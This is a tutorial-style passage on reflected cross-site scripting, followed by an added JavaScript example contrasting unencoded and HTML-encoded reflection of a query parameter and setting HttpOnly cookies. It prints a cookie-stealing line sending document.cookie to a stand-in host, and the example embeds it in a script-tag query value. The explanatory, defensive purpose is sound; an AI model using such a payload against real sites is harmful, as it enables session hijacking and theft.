Reflected XSS
Reflected XSS is one of the most widely exploited web application vulnerabilities. It arises when the application takes one or more parameters as input and reflects them back into the web page it generates. This may not sound harmful at first, but the vulnerability can be exploited to do one or more of the following:
- Execute malicious JavaScript
- Execute client-side exploits
- Bypass CSRF protections
- Cause temporary defacements and other nuisances
The first of these is of considerable concern, as it allows a hacker to have client-side JavaScript code of his choice rendered and executed by the browser of the victim viewing the page. It gets worse when the session or other essential cookies of the user are available to be stolen through the document.cookie property of JavaScript. Consider the following JavaScript code:
window.location='http://evil.example.com/?cookie='+document.cookie
This code, if executed...
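The reflection described above, shown as an added example that is not code from the original page: a page that echoes a `q` parameter unencoded, the same page with the value HTML-encoded, and a session cookie marked HttpOnly so that document.cookie cannot read it. The function names, the `q` parameter and the app.example.test URL are assumptions made for illustration.

```javascript
// Added illustration (not from the original page). All names are hypothetical.

// Encode the characters that let text break out of HTML element content
// or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the request parameter is concatenated into the markup as-is,
// so markup in the parameter becomes markup in the response.
function renderVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the parameter is encoded for the HTML context before it is
// reflected, so the browser displays it as text instead of parsing it.
function renderHardened(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Defense in depth: a cookie set with HttpOnly is not exposed through
// document.cookie, so injected script cannot read the session value.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Check used below: does the response contain a live <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed request URL whose q parameter carries the page's snippet
// wrapped in a script element.
const pageSnippet = "window.location='http://evil.example.com/?cookie='+document.cookie";
const requestUrl = new URL('http://app.example.test/search');
requestUrl.searchParams.set('q', `<script>${pageSnippet}</script>`);
const sampleQuery = requestUrl.searchParams.get('q');

console.log('vulnerable:', renderVulnerable(sampleQuery));
console.log('hardened:  ', renderHardened(sampleQuery));
console.log('Set-Cookie:', sessionCookieHeader('sid', 'constructed-session-id'));
```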